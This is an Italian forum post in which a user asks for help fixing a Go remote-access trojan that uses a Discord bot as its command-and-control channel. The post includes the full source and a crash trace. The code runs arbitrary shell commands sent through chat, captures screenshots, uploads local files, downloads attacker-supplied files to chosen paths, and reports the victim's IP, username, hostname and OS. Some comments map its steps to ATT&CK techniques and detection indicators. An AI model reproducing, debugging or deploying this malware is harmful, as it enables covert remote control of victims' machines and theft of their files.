Praticamente, quando lo script parte, va online, crea il canale della sessione per il malware e invia il messaggio iniziale, ma non ricevo l'output di nessun comando.
Ho provato su Windows, Linux e android
Nessuno funziona.
Aiuto
Ora, abilitando il permesso per i messaggi (tipo la terza volta), è andato, ma dà questo errore nell'esecuzione di un comando:
Ho provato su Windows, Linux e android
Nessuno funziona.
Aiuto
Codice:
package main
import (
"fmt"
"image/png"
"io"
"os"
"os/signal"
"os/exec"
"os/user"
"math/rand"
"net"
"net/http"
"runtime"
"strings"
"syscall"
"time"
"github.com/kbinani/screenshot"
"github.com/bwmarrin/discordgo"
)
// Package-level state shared between main and handler: main stores the ID of
// the channel it creates here, and handler drops every message whose
// ChannelID differs from it.
var (
	myChannelId string
)
// getTmpDir returns the directory used for scratch files: the Windows Tasks
// folder when runtime.GOOS is "windows", /tmp/ on every other platform.
// Both values end with a path separator because the screenshot branch of
// handler builds file names by direct concatenation.
// Both locations are fixed, so file-creation telemetry on them (random
// "*.txt" names, "<n>_<w>x<h>.png" names) is a usable hunting pivot.
func getTmpDir() string {
	switch runtime.GOOS {
	case "windows":
		return "C:\\Windows\\Tasks\\"
	default:
		return "/tmp/"
	}
}
// handler is the MessageCreate callback registered in main. It treats the
// text of each message posted in the session channel as an instruction and
// answers in the same channel, so the chat service is the only transport
// (ATT&CK T1102.002, bidirectional communication over a web service).
//
// Dispatch is on the message content:
//   - prefix "c": run the rest of the message through the OS shell
//   - exactly "s": capture every active display and upload the PNGs
//   - prefix "d": read a local file and upload it
//   - prefix "u": fetch the first attachment and write it to a local path
//   - exactly "💀": close the session and exit the process
//
// A 🕐 reaction is added while the message is processed and replaced by ✅
// when a branch reports success. Almost every error return in this function
// is discarded with the blank identifier or not checked at all.
func handler(s *discordgo.Session, m *discordgo.MessageCreate) {
// Ignores messages in other channels and own messages
if m.ChannelID != myChannelId || m.Author.ID == s.State.User.ID {
return
}
s.MessageReactionAdd(m.ChannelID, m.ID, "🕐") // Processing...
// flag: 0 = nothing handled, 1 = handled, 2 = handled and terminate.
flag := 0
// Shell execution branch (ATT&CK T1059.003 on Windows, T1059.004 elsewhere).
// The command string is the message content from byte offset 14 onward.
// Host-side observable: this process spawning cmd.exe with "/k", or
// /bin/bash with "-c", as a child.
if strings.HasPrefix(m.Content, "c") {
var cmd *exec.Cmd
if runtime.GOOS == "windows" {
cmd = exec.Command("C:\\Windows\\System32\\cmd.exe", "/k", m.Content[14:len(m.Content)])
} else {
cmd = exec.Command("/bin/bash", "-c", m.Content[14:len(m.Content)])
}
// stdout and stderr are captured together; on failure a newline and the
// error text are appended to whatever output was produced.
out, err := cmd.CombinedOutput()
if err != nil {
out = append(out, 0x0a)
out = append(out, []byte(err.Error())...)
}
// Message is too long, save as file
// The threshold is 1987 bytes (2000-13). Longer output is written to a
// randomly named "*.txt" file under getTmpDir(), reopened, and sent as an
// attachment. Nothing in this function deletes that file afterwards.
if (len(out) > 2000-13) {
f, _ := os.CreateTemp(getTmpDir(), "*.txt")
f.Write(out)
fileName := f.Name()
f.Close()
f, _ = os.Open(fileName)
defer f.Close()
fileStruct := &discordgo.File{Name: fileName, Reader: f}
fileArray := []*discordgo.File{fileStruct}
s.ChannelMessageSendComplex(m.ChannelID, &discordgo.MessageSend{Files: fileArray, Reference: m.Reference()})
} else {
// Short output is returned inline as a reply wrapped in a ```bash fence.
var resp strings.Builder
resp.WriteString("```bash\n")
resp.WriteString(string(out) + "\n")
resp.WriteString("```")
s.ChannelMessageSendReply(m.ChannelID, resp.String(), m.Reference())
}
flag = 1
} else if m.Content == "s" {
// Screen capture branch (ATT&CK T1113). One PNG per active display is
// written to getTmpDir() as "<index>_<width>x<height>.png" and uploaded.
// The PNG files are left on disk; no removal call appears in this function.
n := screenshot.NumActiveDisplays()
for i := 0; i < n; i++ {
bounds := screenshot.GetDisplayBounds(i)
img, _ := screenshot.CaptureRect(bounds)
fileName := fmt.Sprintf("%s%d_%dx%d.png", getTmpDir(), i, bounds.Dx(), bounds.Dy())
file, _ := os.Create(fileName)
png.Encode(file, img)
// Both deferred Close calls run when handler returns, not at the end of
// each loop iteration.
defer file.Close()
f, _ := os.Open(fileName)
defer f.Close()
fileStruct := &discordgo.File{Name: fileName, Reader: f}
fileArray := []*discordgo.File{fileStruct}
s.ChannelMessageSendComplex(m.ChannelID, &discordgo.MessageSend{Files: fileArray, Reference: m.Reference()})
}
flag = 1
} else if strings.HasPrefix(m.Content, "d") {
// File read-and-upload branch (ATT&CK T1041, exfiltration over the same
// channel). The path is the message content from byte offset 5 onward and
// is opened as given, with no restriction on location.
fileName := m.Content[5:len(m.Content)]
f, _ := os.Open(fileName)
fi, _ := f.Stat()
defer f.Close()
if fi.Size() < 8388608 { // 8MB file limit
fileStruct := &discordgo.File{Name: fileName, Reader: f}
fileArray := []*discordgo.File{fileStruct}
s.ChannelMessageSendComplex(m.ChannelID, &discordgo.MessageSend{Files: fileArray, Reference: m.Reference()})
flag = 1
} else {
// Oversized files are refused; flag stays 0, so no ✅ is added.
s.ChannelMessageSendReply(m.ChannelID, "File is bigger than 8MB 😔", m.Reference())
}
} else if strings.HasPrefix(m.Content, "u") {
// File write branch (ATT&CK T1105, ingress tool transfer). The destination
// is the message content from byte offset 7 onward; the body of the first
// attachment's URL is fetched with http.Get and copied into it.
// Observables: an outbound HTTP GET to the attachment URL followed by a
// new file at a path taken from the message.
path := m.Content[7:len(m.Content)]
if len(m.Attachments) > 0 {
out, _ := os.Create(path)
defer out.Close()
resp, _ := http.Get(m.Attachments[0].URL)
defer resp.Body.Close()
io.Copy(out, resp.Body)
s.ChannelMessageSendReply(m.ChannelID, "Uploaded file to " + path, m.Reference())
}
// flag is set even when the message carried no attachment.
flag = 1
} else if m.Content == "💀" {
// Termination request: handled after the reactions are updated below.
flag = 2
}
s.MessageReactionRemove(m.ChannelID, m.ID, "🕐", "@me")
if flag > 0 {
s.MessageReactionAdd(m.ChannelID, m.ID, "✅")
if flag > 1 {
// Close the gateway session, then exit with status 0.
s.Close()
os.Exit(0)
}
}
}
// main opens a Discord bot session, creates a per-run text channel in a
// fixed guild, posts and pins a host summary there, and then blocks until a
// termination signal arrives. All tasking is handled by handler.
//
// Indicators visible from this function alone:
//   - a bot credential and a guild ID embedded as string literals in the
//     binary (placeholders in this listing)
//   - a new channel named "sess-<number>" in the guild on every start
//   - a first message in the fixed format built below, carrying IP, user,
//     hostname, OS and working directory (ATT&CK T1016, T1033, T1082)
//   - Discord API traffic originating from a process that is not a browser
//     or the Discord client
//
// Apart from the two err checks, every error return here is discarded.
func main() {
dg, err := discordgo.New("Bot: Bot token here") // Hardcoded bot token
if err != nil {
// Error creating Discord session
return
}
// Handler for CreateMessage events
dg.AddHandler(handler)
// Only guild message events are requested from the gateway.
dg.Identify.Intents = discordgo.IntentsGuildMessages
err = dg.Open()
if err != nil {
// Error opening connection
return
}
// Create new channel
// The name is "sess-" plus a pseudo-random number in [1000, 9998], seeded
// from the current time. The third argument 0 is the channel type passed to
// GuildChannelCreate.
rand.Seed(time.Now().UnixNano())
sessionId := fmt.Sprintf("sess-%d", rand.Intn(9999 - 1000) + 1000)
c, _ := dg.GuildChannelCreate("server discord id", sessionId, 0) // Guild ID is hardcoded
// From here on handler only reacts to messages posted in this channel.
myChannelId = c.ID
// Send first message with basic info (and pin it)
hostname, _ := os.Hostname()
currentUser, _ := user.Current()
cwd, _ := os.Getwd()
// The UDP "connection" to 8.8.8.8:80 is used only to read back the local
// address chosen for that route; nothing is written to the socket here.
conn, _ := net.Dial("udp", "8.8.8.8:80")
defer conn.Close()
localAddr := conn.LocalAddr().(*net.UDPAddr)
firstMsg := fmt.Sprintf("Session *%s* opened! 🥳\n\n**IP**: %s\n**User**: %s\n**Hostname**: %s\n**OS**: %s\n**CWD**: %s", sessionId, localAddr.IP, currentUser.Username, hostname, runtime.GOOS, cwd)
m, _ := dg.ChannelMessageSend(myChannelId, firstMsg)
dg.ChannelMessagePin(myChannelId, m.ID)
// Bot is now running (CTRL+C to quit)
// Block until one of the registered signals is delivered, then close the
// session. The channel created above is not deleted on exit.
sc := make(chan os.Signal, 1)
signal.Notify(sc, syscall.SIGINT, syscall.SIGTERM, os.Interrupt, os.Kill)
<-sc
dg.Close()
}
Ora, abilitando il permesso per i messaggi (tipo la terza volta), è andato, ma dà questo errore nell'esecuzione di un comando:
Codice:
goroutine 31 [running]:
main.handler(0x6d84000, 0x6f79068)
/data/data/com.termux/files/home/storage/shared/projects/discord-c2/client.go:49 +0x1880
github.com/bwmarrin/discordgo.messageCreateEventHandler.Handle(0x48c20f0, 0x6d84000, {0x48a37b8, 0x6f79068})
/data/data/com.termux/files/home/go/src/github.com/bwmarrin/discordgo/eventhandlers.go:753 +0x40
created by github.com/bwmarrin/discordgo.(*Session).handle
/data/data/com.termux/files/home/go/src/github.com/bwmarrin/discordgo/event.go:171 +0x170
exit status 2